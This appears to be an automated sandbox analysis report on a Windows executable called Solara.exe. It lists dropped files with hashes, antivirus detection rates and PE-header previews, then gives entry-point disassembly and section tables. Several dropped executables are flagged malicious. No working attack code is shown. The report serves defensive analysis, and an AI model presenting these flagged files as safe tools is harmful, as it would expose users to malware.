                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Users\user\Desktop\Solara.exe
                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):5468672
                        Entropy (8bit):6.523912582824609
                        Encrypted:false
                        SSDEEP:98304:CKloGqNsn3EQMZrDn2aOzO5wzv80/rvVioLICFIJV6MGG/ZclhOP9fjSmlNi/LbP:Rloly39MBD2BiwPDV/IkIJV6AZcL49fy
                        MD5:87C3DD67BFA3009D89F7B45B01D705B8
                        SHA1:7EB74405565DD5971298B2A2C8DE9116D08DB2D5
                        SHA-256:92722D28951672263B79CD30EB975D770CFD5BD5FF53344FD329546FB950F155
                        SHA-512:C79F10712BB505D3645C9FDF8EF11BD787AB327FC2F176302DE71B5D4A886026E46E40338A5DB964E4B42BD152F3279FDA8F2F842F99876BEE1B0783D2F74E0E
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 68%
                        Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d....;.f.........."...........R.....@..........@..............................S...........`.....................................................<.............S...............S.x...............................(.......8...........x...`............................text...F........................... ..`.rdata..l$.......&..................@..@.data.....R.......R.................@....pdata........S......jS.............@..@.00cfg........S......lS.............@..@.tls..........S......nS.............@....reloc..x.....S......pS.............@..B................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe
                        File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                        Category:dropped
                        Size (bytes):10948608
                        Entropy (8bit):6.9823288417626
                        Encrypted:false
                        SSDEEP:196608:p+lBkH0sN5KVaq4Jsbwd+mftM8y+uevftTJp3q73uGiCHz/u/dLTu:l0saVF4Js8d+F+53Ra3Tj41u
                        MD5:D9D13FA25E880665FB471A4BE57C494C
                        SHA1:7A4C1B09A9D37FF55872544A39A2CC5F0EEC9523
                        SHA-256:632E973AB369D51E21B499E440BDD9C4B2FFAAC9E435485A648DE8724E1B19F7
                        SHA-512:CF20F3C108865614A27D498EE74198EE151027423B518024155B1DFF553B33877AED81E7D5394094625D1EE7DA5DE82FA4ED119420009A3F3FC51019ADD3522E
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 71%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L............................................ ....@..........................@.......o..........................................P....0..................................................................................X............................text...h........................... ..`.rdata....... ......................@..@.bss......... ...........................rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\AppData\Local\Temp\kx new.exe
                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):5471744
                        Entropy (8bit):6.508687886623363
                        Encrypted:false
                        SSDEEP:98304:HV6FhnwA7hlMJ3J08U0bG31vxEuYH2vGDx+PqvqKjZ9+OE9GuqBfp:16HLXuC8U0KFvxEf9D1SOZuqh
                        MD5:7D6398EBFB82A24748617189BF4AD691
                        SHA1:6C96D0E343E1E84BF58670F1249C1694A2012F04
                        SHA-256:D7CD81563E5B98B9A329286557DE71186D3F8F364A46691ACA253CA00E4C3EF2
                        SHA-512:9AEB3DA479B23880DE94E0B283A562CE19A79C2B27CB819DDF8E149ECA5673A42C659FFF10EA2EA9036AEDDA6FEF37B97ECBF37236DD22BAF20EBA1E6DDA4B4A
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 74%
                        Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d..._..f.........."...........R.....@..........@..............................T...........`.................................................H...<.............S...............S.................................(.......8...............`............................text............................... ..`.rdata...'.......(..................@..@.data.....R.......R.................@....pdata........S......vS.............@..@.00cfg........S......xS.............@..@.tls..........S......zS.............@....reloc........S......|S.............@..B................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\Desktop\Solara.exe
                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):5468672
                        Entropy (8bit):6.519628355610314
                        Encrypted:false
                        SSDEEP:98304:LOl8w9dke5gARmiTqHc2+i72sq2GMbo9GYaUbTvcB7abEUGyxByPuZ0:LOlj9dkC8c2F2D2G1GVLB7WBBNG
                        MD5:154202154E41175E801A698CA940EB0C
                        SHA1:6CE074D67C91CB00016CB1095319B00AFAB396A8
                        SHA-256:0612BFB5A51B0B413BA960F7D52BC647BD4CF7530FD760C0D6006AA829E806E2
                        SHA-512:7D0A7474C28B87972FB02A48EE56A2549765A584A53ABBD123631E142A655B17F3508B7D3C2B90F3174D118940143AF12728355900472F27FE8280AA11A8F540
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 76%
                        Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d....;.f.........."...........R.....@..........@..............................S...........`.....................................................<.............S...............S.x...............................(.......8...........x...`............................text............................... ..`.rdata..l$.......&..................@..@.data.....R.......R.................@....pdata........S......jS.............@..@.00cfg........S......lS.............@..@.tls..........S......nS.............@....reloc..x.....S......pS.............@..B................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                        File Type:ASCII text, with CRLF, LF line terminators
                        Category:dropped
                        Size (bytes):1777
                        Entropy (8bit):3.548832160380353
                        Encrypted:false
                        SSDEEP:24:AHq6saJQXQK6zkp5nFC3xtKEkyNodeI5nFC3udee:6s/Xv6zklC3aEky+de2C3udee
                        MD5:6B22E6EF2B3890EABF2B786625B0194C
                        SHA1:33B927413CB71314A4A6D4300793CFCDFF179477
                        SHA-256:FE3EBD9F7FD8EC38410E0A064C6B8BAA2E67DB5F5EF9462380D4E7AFCF134DB6
                        SHA-512:0C6E2F2D62EDAB4C25FE0680725A3BC2015FF9575385665B9D76FC3B7BDE8F4CB1664CD6C6EE35F63FBDFC39E4BE9FB75EBFFB8ED10F135B6C8D874F7E979388
                        Malicious:false
                        Preview: ,gg, .. i8""8i ,dPYb, .. `8,,8' IP'`Yb .. `88' I8 8I .. dP"8, I8 8' .. dP' `8a ,ggggg, I8 dP ,gggg,gg ,gggggg, ,gggg,gg .. dP' `Yb dP" "Y8gggI8dP dP" "Y8I dP""""8I dP" "Y8I .._ ,dP' I8 i8' ,8I I8P i8' ,8I ,8' 8I i8' ,8I .."888,,____,dP,d8, ,d8' ,d8b,_ ,d8, ,d8b,,dP Y8,,d8, ,d8b,..a8P"Y88888P" P"Y8888P" 8P'"Y88P"Y8888P"`Y88P `Y8P"Y8888P"`Y8.. .. .. .. ..
                        File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                        Entropy (8bit):7.026619238846845
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.94%
                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:Solara.exe
                        File size:22'179'840 bytes
                        MD5:a6bf6970741f337bcb700166165c1f30
                        SHA1:f90ace8f03e2b76e243d539c8570d157f658d025
                        SHA256:139c41c5638d344cf6a0f8fb38c61b3f657544b01dd95daff62d0e4b8ff908a1
                        SHA512:c5ef34314bfbd5db99d8d02981e4ce5b46776bdae87e4768963fa902319a4d9712afe7bca302688a424eb9e7dffb9aa5da8444ea2877a48e3f9dd67622477521
                        SSDEEP:393216:fOQxoHOKgCanLd/l/NmA6MierK6sl0Ibft5/TqcJb45EGle:2hOKgj/4MTrKV9ft5bqR5EGle
                        TLSH:0D2733B62ACFD40FCB856F7C865FA73A187D01AA8D378E416C2D6642D4D482119F1FA3
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L............................dR..............`N...@...........................R......JS....................................
                        Icon Hash:f0e9c4f0d8e972c3
                        Entrypoint:0x401509
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                        DLL Characteristics:
                        Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:a9c887a4f18a3fede2cc29ceea138ed3
                        Instruction
                        push ebp
                        mov ebp, esp
                        sub esp, 00000008h
                        nop
                        mov eax, 00000004h
                        push eax
                        mov eax, 00000000h
                        push eax
                        lea eax, dword ptr [ebp-04h]
                        push eax
                        call 00007F2080BC82CDh
                        add esp, 0Ch
                        mov eax, 004014E7h
                        push eax
                        call 00007F2080BC8307h
                        mov eax, 00000001h
                        push eax
                        call 00007F2080BC8304h
                        add esp, 04h
                        mov eax, 00030000h
                        push eax
                        mov eax, 00010000h
                        push eax
                        call 00007F2080BC82F8h
                        add esp, 08h
                        mov eax, dword ptr [018E5E34h]
                        mov ecx, dword ptr [018E5E38h]
                        mov edx, dword ptr [018E5E3Ch]
                        mov dword ptr [ebp-08h], eax
                        lea eax, dword ptr [ebp-04h]
                        push eax
                        mov eax, dword ptr [018E6000h]
                        push eax
                        push edx
                        push ecx
                        mov eax, dword ptr [ebp-08h]
                        push eax
                        call 00007F2080BC82D2h
                        add esp, 14h
                        mov eax, dword ptr [018E5E34h]
                        mov ecx, dword ptr [018E5E38h]
                        mov edx, dword ptr [018E5E3Ch]
                        mov dword ptr [ebp-08h], eax
                        mov eax, dword ptr [edx]
                        push eax
                        mov eax, dword ptr [ecx]
                        push eax
                        mov eax, dword ptr [ebp-08h]
                        mov eax, dword ptr [eax]
                        push eax
                        call 00007F2080BC80ACh
                        add esp, 0Ch
                        push eax
                        call 00007F2080BC82A8h
                        add esp, 04h
                        leave
                        ret
                        push ebp
                        mov ebp, esp
                        sub esp, 00000004h
                        nop
                        mov eax, dword ptr [018E5E34h]
                        mov ecx, dword ptr [ebp+08h]
                        mov dword ptr [eax], ecx
                        mov eax, dword ptr [00000000h]
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x14e5dc0 | 0x50 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x14e7000 | 0x423f0 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x14e5e10 | 0x58 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x6a0 | 0x800 | de9df424dae4316c171c3c4920f66543 | False | 0.4248046875 | data | 4.823881234246199 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x2000 | 0x14e3fc3 | 0x14e4000 | 8e808ee215270786bdb726af73024b70 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .bss | 0x14e6000 | 0x4 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
